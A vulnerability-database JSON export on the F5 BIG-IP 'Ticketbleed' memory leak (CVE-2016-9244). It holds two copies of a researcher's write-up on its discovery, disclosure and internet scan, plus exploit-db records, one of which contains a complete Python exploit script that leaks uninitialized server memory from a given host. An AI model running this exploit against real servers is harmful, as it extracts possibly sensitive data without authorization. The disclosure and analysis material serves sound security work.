padding. That's... memory?\n\nAt this point the impression of dealing with a Heartbleed-like vulnerability got pretty clear. 
The server is allocating a buffer as big as the client's Session ID, and then always sending back 32 bytes, bringing along whatever uninitialized memory was in the extra bytes.\n\n## Browser diving\n\nI had one last source of skepticism: how could this not have been noticed before?\n\nThe answer is banal: all browsers use 32-byte Session IDs to negotiate Session Tickets. Together with Nick Sullivan I checked NSS, OpenSSL and BoringSSL to confirm. [Here's BoringSSL for example](<https://github.com/google/boringssl/blob/33fe4a0d1406f423e7424ea7367e1d1a51c2edc1/ssl/handshake_client.c#L1901-L1908>).\n \n \n /* Generate a session ID for this session based on the session ticket. We use\n * the session ID mechanism for detecting ticket resumption. This also fits in\n * with assumptions elsewhere in OpenSSL.*/\n if (!EVP_Digest(CBS_data(&ticket), CBS_len(&ticket),\n session->session_id, &session->session_id_length,\n EVP_sha256(), NULL)) {\n goto err;\n }\n \n\nBoringSSL uses a SHA256 hash of the Session Ticket, which is exactly 32 bytes.\n\n(Interestingly, from speaking to people in the TLS field, there was an idle intention to switch to 1-byte Session IDs but no one had tested it widely yet.)\n\nAs for Go, it\u2019s probably the case that client-side Session Tickets are not enabled that often.\n\n## Disclosure diving\n\nAfter realizing the security implications of this issue we compartmentalized it inside the company, made sure our Support team would advise our customer to simply disable Session Tickets, and sought to contact F5.\n\nAfter a couple misdirected emails that were met by requests for Serial Numbers, we got in contact with the F5 SIRT, exchanged PGP keys, and provided a report and a PoC.\n\nThe report was escalated to the development team, and confirmed to be an uninitialized memory disclosure limited to the Session Ticket functionality.\n\nIt's unclear what data might be exfiltrated via this vulnerability, but Heartbleed and the [Cloudflare Heartbleed 
Challenge](<https://blog.cloudflare.com/the-results-of-the-cloudflare-challenge/>) taught us not to make assumptions of safety with uninitialized memory.\n\nIn planning a timeline, the F5 team was faced with a rigid release schedule. Considering multiple factors, including the availability of an effective mitigation (disabling Session Tickets) and the apparent triviality of the vulnerability, I decided to adhere to the [industry-standard disclosure policy adopted by Google's Project Zero](<https://googleprojectzero.blogspot.co.uk/2015/02/feedback-and-data-driven-updates-to.html>): 90 days with 15 days of grace period if a fix is due to be released.\n\nBy coincidence today coincides with both the expiration of those terms and the scheduled release of the first hotfix for one of the affected versions.\n\nI'd like to thank the F5 SIRT for their professionalism, transparency and collaboration, which were in pleasant contrast with the stories of adversarial behavior we hear too often in the industry.\n\nThe issue was assigned CVE-2016-9244.\n\n## Internet diving\n\nWhen we reported the issue to F5 I had tested the vulnerability against a single host, which quickly became unavailable after disabling Session Tickets. That meant having both low confidence in the extent of the vulnerability, and no way to reproduce it.\n\nThis was the perfect occasion to perform an Internet scan. I picked the toolkit that powers Censys.io by the University of Michigan: zmap and zgrab.\n\nzmap is an IPv4-space scanning tool that detects open ports, while zgrab is a Go tool that follows up by connecting to those ports and collecting a number of protocol details.\n\nI added support for Session Ticket resumption to zgrab, and then wrote a simple Ticketbleed detector by having zgrab send a 31-byte Session ID, and comparing it with the one returned by the server.\n \n \n diff --git a/ztools/ztls/handshake_client.go b/ztools/ztls/handshake_client.go \n index e6c506b..af098d3 100644 \n 
--- a/ztools/ztls/handshake_client.go\n +++ b/ztools/ztls/handshake_client.go\n @@ -161,7 +161,7 @@ func (c *Conn) clientHandshake() error {\n session, sessionCache = nil, nil\n hello.ticketSupported = true\n hello.sessionTicket = []byte(c.config.FixedSessionTicket)\n - hello.sessionId = make([]byte, 32)\n + hello.sessionId = make([]byte, 32-1)\n if _, err := io.ReadFull(c.config.rand(), hello.sessionId); err != nil {\n c.sendAlert(alertInternalError)\n return errors.New(\"tls: short read from Rand: \" + err.Error())\n 
@@ -658,8 +658,11 @@ func (hs *clientHandshakeState) processServerHello() (bool, error) {\n \n if c.config.FixedSessionTicket != nil {\n c.resumption = &Resumption{\n - Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\n - SessionID: hs.serverHello.sessionId,\n + Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\n + TicketBleed: len(hs.serverHello.sessionId) > len(hs.hello.sessionId) &&\n + bytes.Equal(hs.serverHello.sessionId[:len(hs.hello.sessionId)], hs.hello.sessionId),\n + ServerSessionID: hs.serverHello.sessionId,\n + ClientSessionID: hs.hello.sessionId,\n }\n return false, FixedSessionTicketError\n }\n \n\nBy picking 31 bytes I ensured the sensitive information leakage would be negligible.\n\nI then downloaded the latest zgrab results from the Censys website, which thankfully included information on what hosts supported Session Tickets, and completed the pipeline with abundant doses of `pv` and `jq`.\n\nAfter getting two hits in the first 1,000 hosts from the Alexa top 1m list in November, I interrupted the scan to avoid leaking the vulnerability and postponed to a date closer to the disclosure.\n\nWhile producing this writeup I completed the scan, and found between 0.1% and 0.2% of all hosts to be vulnerable, or 0.4% of the websites supporting Session Tickets.\n\n## Read more\n\nFor more details visit the [F5 K05121675 article](<https://support.f5.com/csp/article/K05121675>) or [ticketbleed.com](<https://ticketbleed.com>), where you'll find a technical summary, affected versions, mitigation instructions, a complete timeline, scan results, IPs of the scanning machines, and an online test.\n\nOtherwise, you might want to [follow me on Twitter](<https://twitter.com/FiloSottile>).", "modified": "2017-02-09T02:14:44", "published": "2017-02-09T02:14:44", "id": "FILIPPOIO:32170BE31128BEE98AEEE466ABFDA40A", "href": "https://blog.filippo.io/finding-ticketbleed/", "type": 
"filippoio", "title": "Finding Ticketbleed", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-08T03:14:39", "bulletinFamily": "blog", "cvelist": ["CVE-2016-9244"], "description": "Ticketbleed (CVE-2016-9244) is a software vulnerability in the TLS stack of certain F5 products that allows a remote attacker to extract up to 31 bytes of uninitialized memory at a time, which can contain any kind of random sensitive information, like in Heartbleed.\n\nIf you suspect you might be affected by this vulnerability, you can find details and mitigation instructions at [ticketbleed.com](<https://ticketbleed.com>) (including an online test) or in the [F5 K05121675 article](<https://support.f5.com/csp/article/K05121675>).\n\n\n\nIn this post we'll talk about how Ticketbleed was found, verified and reported.\n\n## JIRA RG-XXX\n\nIt all started with a bug report from a customer using Cloudflare [Railgun](<https://www.cloudflare.com/website-optimization/railgun/>).\n\n> **rg-listener <> origin requests fail with \"local error: unexpected message\"**\n> \n> A PCAP of the rg-listener <> origin traffic is attached and shows a TLS alert being triggered during the handshake.\n> \n> Worth noting the customer is using an F5 Load Balancer in front of the Railgun and the Origin Web Server: \n`visitor > edge > cache > rg-sender > F5 > rg-listener > F5 > origin web server`\n> \n> Matthew was unable to replicate by using a basic TLS.Dial in Go so this seems tricky so far.\n\nA bit of context on Railgun: Railgun speeds up requests between the Cloudflare edge and the origin web site by establishing a permanent optimized connection and performing delta compression on HTTP responses.\n\n\n\nThe Railgun connection uses a custom binary protocol over TLS, and the two endpoints are Go programs: one on the Cloudflare edge and one installed on the customer servers. 
This means that the whole connection goes through the Go TLS stack, crypto/tls.\n\nThat connection failing with `local error: unexpected message` means that the customer\u2019s side of the connection sent something that confused the Go TLS stack of the Railgun running on our side. Since the customer is running an F5 load balancer between their Railgun and ours, this points towards an **incompatibility between the Go TLS stack and the F5 one**.\n\nHowever, when my colleague Matthew tried to reproduce the issue by connecting to the load balancer with a simple Go `crypto/tls.Dial`, it succeeded.\n\n## PCAP diving\n\nSince Matthew sits at a desk opposite of mine in the Cloudflare London office, he knew I've been working with the Go TLS stack for our TLS 1.3 implementation. We quickly ended up in a joint debugging session.\n\nHere's the PCAP we were staring at.\n\n\n\nSo, there's the ClientHello, right. The ServerHello, so far so good. And then immediately a ChangeCipherSpec. Oh. Ok.\n\nA ChangeCipherSpec is how TLS 1.2 says \"let's switch to encrypted\". The only way a ChangeCipherSpec can come this early in a 1.2 handshake, is if session resumption happened.\n\nAnd indeed, by focusing on the ClientHello we can see that the Railgun client sent a Session Ticket.\n\n\n\nA Session Ticket carries some encrypted key material from a previous session to allow the server to resume that previous session immediately instead of negotiating a new one.\n\n\n\n_To learn more about session resumption in TLS 1.2, watch the first part of [the Cloudflare Crypto Team TLS 1.3 talk](<https://blog.cloudflare.com/tls-1-3-explained-by-the-cloudflare-crypto-team-at-33c3/>), [read the transcript](<https://blog.cloudflare.com/tls-1-3-overview-and-q-and-a/>), or the [\"TLS Session Resumption\" post](<https://blog.cloudflare.com/tls-session-resumption-full-speed-and-secure/>) on the Cloudflare blog._\n\nAfter that ChangeCipherSpec both Railgun and Wireshark get pretty confused (HelloVerifyRequest? 
Umh?). So we have reason to believe the issue is related to Session Tickets.\n\nIn Go you have to explicitly enable Session Tickets on the client side by setting a `ClientSessionCache`. We verified that indeed Railgun uses this functionality and wrote this small test:\n \n \n package main\n \n import (\n \"crypto/tls\"\n )\n \n func main() {\n conf := &tls.Config{\n InsecureSkipVerify: true,\n ClientSessionCache: tls.NewLRUClientSessionCache(32),\n }\n \n conn, err := tls.Dial(\"tcp\", \"redacted:443\", conf)\n if err != nil {\n panic(\"failed to connect: \" + err.Error())\n }\n conn.Close()\n \n conn, err = tls.Dial(\"tcp\", \"redacted:443\", conf)\n if err != nil {\n panic(\"failed to resume: \" + err.Error())\n }\n conn.Close()\n }\n \n\nAnd sure enough, `local error: unexpected message`.\n\n## crypto/tls diving\n\nOnce I had it reproduced in a local `crypto/tls` it became a home game. `crypto/tls` error messages tend to be short of details, but a quick tweak allows us to pinpoint where they are generated.\n\nEvery time a fatal error occurs, `setErrorLocked` is called to record the error and make sure that all following operations fail. That function is usually called from the site of the error.\n\nA well placed `panic(err)` will drop a stack trace that should show us _what_ message is unexpected.\n \n \n diff --git a/src/crypto/tls/conn.go b/src/crypto/tls/conn.go\n index 77fd6d3254..017350976a 100644\n --- a/src/crypto/tls/conn.go\n +++ b/src/crypto/tls/conn.go\n 
@@ -150,8 +150,7 @@ type halfConn struct {\n }\n \n func (hc *halfConn) setErrorLocked(err error) error {\n - hc.err = err\n - return err\n + panic(err)\n }\n \n // prepareCipherSpec sets the encryption and MAC states\n \n \n \n panic: local error: tls: unexpected message\n \n goroutine 1 [running]:\n panic(0x185340, 0xc42006fae0)\n \t/Users/filippo/code/go/src/runtime/panic.go:500 +0x1a1\n crypto/tls.(*halfConn).setErrorLocked(0xc42007da38, 0x25e6e0, 0xc42006fae0, 0x25eee0, 0xc4200c0af0)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:153 +0x4d\n crypto/tls.(*Conn).sendAlertLocked(0xc42007d880, 0x1c390a, 0xc42007da38, 0x2d)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:719 +0x147\n crypto/tls.(*Conn).sendAlert(0xc42007d880, 0xc42007990a, 0x0, 0x0)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:727 +0x8c\n crypto/tls.(*Conn).readRecord(0xc42007d880, 0xc400000016, 0x0, 0x0)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:672 +0x719\n crypto/tls.(*Conn).readHandshake(0xc42007d880, 0xe7a37, 0xc42006c3f0, 0x1030e, 0x0)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:928 +0x8f\n crypto/tls.(*clientHandshakeState).doFullHandshake(0xc4200b7c10, 0xc420070480, 0x55)\n \t/Users/filippo/code/go/src/crypto/tls/handshake_client.go:262 +0x8c\n crypto/tls.(*Conn).clientHandshake(0xc42007d880, 0x1c3928, 0xc42007d988)\n \t/Users/filippo/code/go/src/crypto/tls/handshake_client.go:228 +0xfd1\n crypto/tls.(*Conn).Handshake(0xc42007d880, 0x0, 0x0)\n \t/Users/filippo/code/go/src/crypto/tls/conn.go:1259 +0x1b8\n crypto/tls.DialWithDialer(0xc4200b7e40, 0x1ad310, 0x3, 0x1af02b, 0xf, 0xc420092580, 0x4ff80, 0xc420072000, 0xc42007d118)\n \t/Users/filippo/code/go/src/crypto/tls/tls.go:146 +0x1f8\n crypto/tls.Dial(0x1ad310, 0x3, 0x1af02b, 0xf, 0xc420092580, 0xc42007ce00, 0x0, 0x0)\n \t/Users/filippo/code/go/src/crypto/tls/tls.go:170 +0x9d\n \n\nSweet, let's see where the unexpected message alert is sent, at `conn.go:672`.\n \n \n 670 case recordTypeChangeCipherSpec:\n 671 if typ != 
want || len(data) != 1 || data[0] != 1 {\n 672 c.in.setErrorLocked(c.sendAlert(alertUnexpectedMessage))\n 673 break\n 674 }\n 675 err := c.in.changeCipherSpec()\n 676 if err != nil {\n 677 c.in.setErrorLocked(c.sendAlert(err.(alert)))\n 678 }\n \n\nSo the message we didn't expect is the ChangeCipherSpec. Let's see if the higher stack frames give us an indication as to what we expected instead. Let's chase `handshake_client.go:262`.\n \n \n 259 func (hs *clientHandshakeState) doFullHandshake() error {\n 260 c := hs.c\n 261\n 262 msg, err := c.readHandshake()\n 263 if err != nil {\n 264 return err\n 265 }\n \n\nAh, `doFullHandshake`. Wait. The server here is clearly doing a resumption (sending a Change Cipher Spec immediately after the Server Hello), while the client... tries to do a full handshake?\n\nIt looks like the client offers a Session Ticket, the server _accepts it_, but the client _doesn't realize and carries on_.\n\n## RFC diving\n\nAt this point I had to fill a gap in my TLS 1.2 knowledge. How does a server signal acceptance of a Session Ticket?\n\n[RFC 5077](<https://tools.ietf.org/html/rfc5077>), which obsoletes RFC 4507, says:\n\n> When presenting a ticket, the client MAY generate and include a \nSession ID in the TLS ClientHello. 
If the server accepts the ticket \nand the Session ID is not empty, then it MUST respond with the same \nSession ID present in the ClientHello.\n\nSo a client that doesn't want to guess whether a Session Ticket is accepted or not will send a Session ID and look for it to be echoed back by the server.\n\nThe code in `crypto/tls`, clear as always, does exactly that.\n \n \n func (hs *clientHandshakeState) serverResumedSession() bool {\n // If the server responded with the same sessionId then it means the\n // sessionTicket is being used to resume a TLS session.\n return hs.session != nil && hs.hello.sessionId != nil &&\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\n }\n \n\n## Session IDs diving\n\nSomething must be going wrong there. Let's practice some healthy print-based debugging.\n \n \n diff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go\n index f789e6f888..2868802d82 100644\n --- a/src/crypto/tls/handshake_client.go\n +++ b/src/crypto/tls/handshake_client.go\n 
@@ -552,6 +552,8 @@ func (hs *clientHandshakeState) establishKeys() error {\n func (hs *clientHandshakeState) serverResumedSession() bool {\n // If the server responded with the same sessionId then it means the\n // sessionTicket is being used to resume a TLS session.\n + println(hex.Dump(hs.hello.sessionId))\n + println(hex.Dump(hs.serverHello.sessionId))\n return hs.session != nil && hs.hello.sessionId != nil &&\n bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId)\n }\n \n \n \n 00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.|\n \n 00000000 a8 73 2f c4 c9 80 e2 ef b8 e0 b7 da cf 0d 71 e5 |.s/...........q.|\n 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\n \n\nAh. The F5 server is padding the Session ID to its maximum length of 32 bytes, instead of returning it as the client sent it. crypto/tls in Go uses 16 byte Session IDs.\n\nFrom there the failure mode is clear: the server thinks it told the client to use the ticket, the client thinks the server started a new session, and things get unexpected.\n\nIn the TLS space we have seen quite some incompatibilities like this. Notoriously, ClientHellos have to be either shorter than 256 bytes or longer than 512 [not to clash with some server implementations](<https://bugs.chromium.org/p/chromium/issues/detail?id=315828>).\n\nI was about to write this up as just another real world TLS quirk when...\n \n \n 00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%|\n \n 00000000 79 bd e5 a8 77 55 8b 92 41 e9 89 45 e1 50 31 25 |y...wU..A..E.P1%|\n 00000010 04 27 a8 4f 63 22 de 8b ef f9 a3 13 dd 66 5c ee |.'.Oc\".......f\\.|\n \n\nUh oh. Wait. Those are not zeroes. That's not padding. That's... memory?\n\nAt this point the impression of dealing with a Heartbleed-like vulnerability got pretty clear. 
The server is allocating a buffer as big as the client's Session ID, and then sending back always 32 bytes, bringing along whatever unallocated memory was in the extra bytes.\n\n## Browser diving\n\nI had one last source of skepticism: how could this not have been noticed before?\n\nThe answer is banal: all browsers use 32-byte Session IDs to negotiate Session Tickets. Together with Nick Sullivan I checked NSS, OpenSSL and BoringSSL to confirm. [Here's BoringSSL for example](<https://github.com/google/boringssl/blob/33fe4a0d1406f423e7424ea7367e1d1a51c2edc1/ssl/handshake_client.c#L1901-L1908>).\n \n \n /* Generate a session ID for this session based on the session ticket. We use\n * the session ID mechanism for detecting ticket resumption. This also fits in\n * with assumptions elsewhere in OpenSSL.*/\n if (!EVP_Digest(CBS_data(&ticket), CBS_len(&ticket),\n session->session_id, &session->session_id_length,\n EVP_sha256(), NULL)) {\n goto err;\n }\n \n\nBoringSSL uses a SHA256 hash of the Session Ticket, which is exactly 32 bytes.\n\n(Interestingly, from speaking to people in the TLS field, there was an idle intention to switch to 1-byte Session IDs but no one had tested it widely yet.)\n\nAs for Go, it\u2019s probably the case that client-side Session Tickets are not enabled that often.\n\n## Disclosure diving\n\nAfter realizing the security implications of this issue we compartmentalized it inside the company, made sure our Support team would advise our customer to simply disable Session Tickets, and sought to contact F5.\n\nAfter a couple misdirected emails that were met by requests for Serial Numbers, we got in contact with the F5 SIRT, exchanged PGP keys, and provided a report and a PoC.\n\nThe report was escalated to the development team, and confirmed to be an uninitialized memory disclosure limited to the Session Ticket functionality.\n\nIt's unclear what data might be exfiltrated via this vulnerability, but Heartbleed and the [Cloudflare Heartbleed 
Challenge](<https://blog.cloudflare.com/the-results-of-the-cloudflare-challenge/>) taught us not to make assumptions of safety with uninitialized memory.\n\nIn planning a timeline, the F5 team was faced with a rigid release schedule. Considering multiple factors, including the availability of an effective mitigation (disabling Session Tickets) and the apparent triviality of the vulnerability, I decided to adhere to the [industry-standard disclosure policy adopted by Google's Project Zero](<https://googleprojectzero.blogspot.co.uk/2015/02/feedback-and-data-driven-updates-to.html>): 90 days with 15 days of grace period if a fix is due to be released.\n\nBy coincidence today coincides with both the expiration of those terms and the scheduled release of the first hotfix for one of the affected versions.\n\nI'd like to thank the F5 SIRT for their professionalism, transparency and collaboration, which were in pleasant contrast with the stories of adversarial behavior we hear too often in the industry.\n\nThe issue was assigned CVE-2016-9244.\n\n## Internet diving\n\nWhen we reported the issue to F5 I had tested the vulnerability against a single host, which quickly became unavailable after disabling Session Tickets. That meant having both low confidence in the extent of the vulnerability, and no way to reproduce it.\n\nThis was the perfect occasion to perform an Internet scan. I picked the toolkit that powers Censys.io by the University of Michigan: zmap and zgrab.\n\nzmap is an IPv4-space scanning tool that detects open ports, while zgrab is a Go tool that follows up by connecting to those ports and collecting a number of protocol details.\n\nI added support for Session Ticket resumption to zgrab, and then wrote a simple Ticketbleed detector by having zgrab send a 31-byte Session ID, and comparing it with the one returned by the server.\n \n \n diff --git a/ztools/ztls/handshake_client.go b/ztools/ztls/handshake_client.go\n index e6c506b..af098d3 100644\n 
--- a/ztools/ztls/handshake_client.go\n +++ b/ztools/ztls/handshake_client.go\n @@ -161,7 +161,7 @@ func (c *Conn) clientHandshake() error {\n session, sessionCache = nil, nil\n hello.ticketSupported = true\n hello.sessionTicket = []byte(c.config.FixedSessionTicket)\n - hello.sessionId = make([]byte, 32)\n + hello.sessionId = make([]byte, 32-1)\n if _, err := io.ReadFull(c.config.rand(), hello.sessionId); err != nil {\n c.sendAlert(alertInternalError)\n return errors.New(\"tls: short read from Rand: \" + err.Error())\n 
@@ -658,8 +658,11 @@ func (hs *clientHandshakeState) processServerHello() (bool, error) {\n \n if c.config.FixedSessionTicket != nil {\n c.resumption = &Resumption{\n - Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\n - SessionID: hs.serverHello.sessionId,\n + Accepted: hs.hello.sessionId != nil && bytes.Equal(hs.serverHello.sessionId, hs.hello.sessionId),\n + TicketBleed: len(hs.serverHello.sessionId) > len(hs.hello.sessionId) &&\n + bytes.Equal(hs.serverHello.sessionId[:len(hs.hello.sessionId)], hs.hello.sessionId),\n + ServerSessionID: hs.serverHello.sessionId,\n + ClientSessionID: hs.hello.sessionId,\n }\n return false, FixedSessionTicketError\n }\n \n\nBy picking 31 bytes I ensured the sensitive information leakage would be negligible.\n\nI then downloaded the latest zgrab results from the Censys website, which thankfully included information on what hosts supported Session Tickets, and completed the pipeline with abundant doses of `pv` and `jq`.\n\nAfter getting two hits in the first 1,000 hosts from the Alexa top 1m list in November, I interrupted the scan to avoid leaking the vulnerability and postponed to a date closer to the disclosure.\n\nWhile producing this writeup I completed the scan, and found between 0.1% and 0.2% of all hosts to be vulnerable, or 0.4% of the websites supporting Session Tickets.\n\n## Read more\n\nFor more details visit the [F5 K05121675 article](<https://support.f5.com/csp/article/K05121675>) or [ticketbleed.com](<https://ticketbleed.com>), where you'll find a technical summary, affected versions, mitigation instructions, a complete timeline, scan results, IPs of the scanning machines, and an online test.\n\nOtherwise, you might want to [follow me on Twitter](<https://twitter.com/FiloSottile>).", "modified": "2017-02-09T02:14:44", "published": "2017-02-09T02:14:44", "id": "FILIPPOIO:40FACE5F541A5201E7FCDFC21AC6E3D2", "href": "https://blog.filippo.io/finding-ticketbleed/", "type": 
"filippoio", "title": "Finding Ticketbleed", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2017-02-11T00:59:51", "description": "F5 BIG-IP SSL Virtual Server - Memory Disclosure. CVE-2016-9244. Remote exploit for Hardware platform", "published": "2017-02-10T00:00:00", "type": "exploitdb", "title": "F5 BIG-IP SSL Virtual Server - Memory Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-10T00:00:00", "id": "EDB-ID:41298", "href": "https://www.exploit-db.com/exploits/41298/", "sourceData": "/*\r\n# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]\r\n# Date: [10.02.2017]\r\n# Exploit Author: [Ege Balc\u00c4\u00b1]\r\n# Vendor Homepage: [https://f5.com/]\r\n# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]\r\n# Tested on: [Multiple]\r\n# CVE : [CVE-2016-9244]\r\n\r\nPOC:\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41298/"}, {"lastseen": "2018-05-24T14:14:13", "description": "F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure. CVE-2016-9244. 
Remote exploit for Hardware platform", "published": "2017-02-14T00:00:00", "type": "exploitdb", "title": "F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-14T00:00:00", "id": "EDB-ID:44446", "href": "https://www.exploit-db.com/exploits/44446/", "sourceData": "# -*- coding: utf-8 -*-\r\n#!/usr/bin/python\r\n# Exploit Title: Ticketbleed\r\n# Google Dork: n/a\r\n# Date: Exploit: 02/13/17, Advisory Published: 02/09/17 \r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: https://f5.com/\r\n# Software Link: https://support.f5.com/csp/article/K05121675\r\n# Version: see software link for versions\r\n# Tested on: F5 BIGIP 11.6\r\n# CVE : CVE-2016-9244\r\n# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)\r\nimport re, getopt, sys, socket\r\nfrom struct import *\r\ntry:\r\n from scapy_ssl_tls.ssl_tls import *\r\nexcept ImportError:\r\n from scapy.layers.ssl_tls import *\r\n\r\ndef banner():\r\n print '''\r\n lol ty filippo!\r\n ty tintinweb!\r\n 0000000000000\r\n 0000000000000000000 00\r\n 00000000000000000000000000000\r\n 0000000000000000000000000000000\r\n 000000000 0000000000\r\n 00000000 0000000000\r\n 0000000 000000000000\r\n 0000000 000000000000000\r\n 000000 000000000 000000\r\n0000000 000000000 000000\r\n000000 000000000 000000\r\n000000 000000000 000000\r\n000000 00000000 000000\r\n000000 000000000 000000\r\n0000000 000000000 0000000\r\n 000000 000000000 000000\r\n 0000000000000000 0000000\r\n 0000000000000 0000000\r\n 00000000000 00000000\r\n 00000000000 000000000\r\n 0000000000000000000000000000000\r\n 00000000000000000000000000000\r\n 000 0000000000000000000\r\n 0000000000000\r\n @0x00string\r\nhttps://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py\r\n'''\r\n\r\ndef usage ():\r\n print (\"python script.py <args>\\n\"\r\n \" -h, --help: Show this message\\n\"\r\n \" -a, --rhost: Target IP address\\n\"\r\n \" -b, --rport: Target 
port\\n\"\r\n \"\\n\\n\"\r\n \"Examples:\\n\"\r\n \"python script.py -a 10.10.10.10 -b 443\\n\"\r\n \"python script.py --rhost 10.10.10.10 --rport 8443\")\r\n exit()\r\n\r\ndef pretty (t, m):\r\n if (t is \"+\"):\r\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"-\"):\r\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"*\"):\r\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"!\"):\r\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\r\n\r\ndef createDump (input):\r\n d, b, h = '', [], []\r\n u = list(input)\r\n for e in u:\r\n h.append(e.encode(\"hex\"))\r\n if e == '0x0':\r\n b.append('0')\r\n elif 30 > ord(e) or ord(e) > 128:\r\n b.append('.')\r\n elif 30 < ord(e) or ord(e) < 128:\r\n b.append(e)\r\n\r\n i = 0\r\n while i < len(h):\r\n if (len(h) - i ) >= 16:\r\n d += ' '.join(h[i:i+16])\r\n d += \" \"\r\n d += ' '.join(b[i:i+16])\r\n d += \"\\n\"\r\n i = i + 16\r\n else:\r\n d += ' '.join(h[i:(len(h) - 0 )])\r\n pad = len(' '.join(h[i:(len(h) - 0 )]))\r\n d += ' ' * (56 - pad)\r\n d += ' '.join(b[i:(len(h) - 0 )])\r\n d += \"\\n\"\r\n i = i + len(h)\r\n return d\r\n\r\ndef ticketBleed (rhost, rport):\r\n h = (rhost,int(rport));\r\n version = TLSVersion.TLS_1_2\r\n secret = \"\"\r\n session_ticket = \"\"\r\n sid = \"\"\r\n cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA\r\n with TLSSocket(socket.socket(), client=True) as sock:\r\n sock.connect(h)\r\n ctx = sock.tls_ctx\r\n \tpacket = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=\"\")])\r\n sock.sendall(packet)\r\n sock.recvall()\r\n \tpacket_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()\r\n packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()\r\n sock.sendall(TLS.from_records([packet_ke, packet_ccs]))\r\n sock.sendall(to_raw(TLSFinished(), ctx))\r\n ret = sock.recvall()\r\n 
session_ticket = ret[TLSSessionTicket].ticket\r\n secret = ctx.master_secret\r\n #pretty(\"*\", \"ctx 1: \\n\" + str(ctx))\r\n with TLSSocket(socket.socket(), client=True) as sock:\r\n sock.connect(h)\r\n ctx = sock.tls_ctx\r\n \tpacket = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id=\"A\", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])\r\n sock.tls_ctx.resume_session(secret)\r\n sock.sendall(packet)\r\n ret = sock.recvall()\r\n sid = ret[TLSServerHello].session_id\r\n #pretty(\"*\", \"ctx 2: \\n\" + str(ctx))\r\n pretty(\"+\", \"bled 'A' + 31 bytes: \\n\" + createDump(sid))\r\n\r\ndef main():\r\n rhost = None;\r\n rport = None;\r\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])\r\n for opt, arg in options:\r\n if opt in ('-h', '--help'):\r\n usage()\r\n elif opt in ('-a','--rhost'):\r\n rhost = arg;\r\n elif opt in ('-b','--rport'):\r\n rport = arg;\r\n banner()\r\n if rhost is None or rport is None:\r\n usage()\r\n ticketBleed(rhost,rport)\r\n exit(0);\r\n\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/44446/"}], "nessus": [{"lastseen": "2021-04-01T02:08:22", "description": "A BIG-IP SSL virtual server with the non-default Session Tickets\noption enabled may leak up to 31 bytes of uninitialized memory, aka\nthe Ticketbleed bug. 
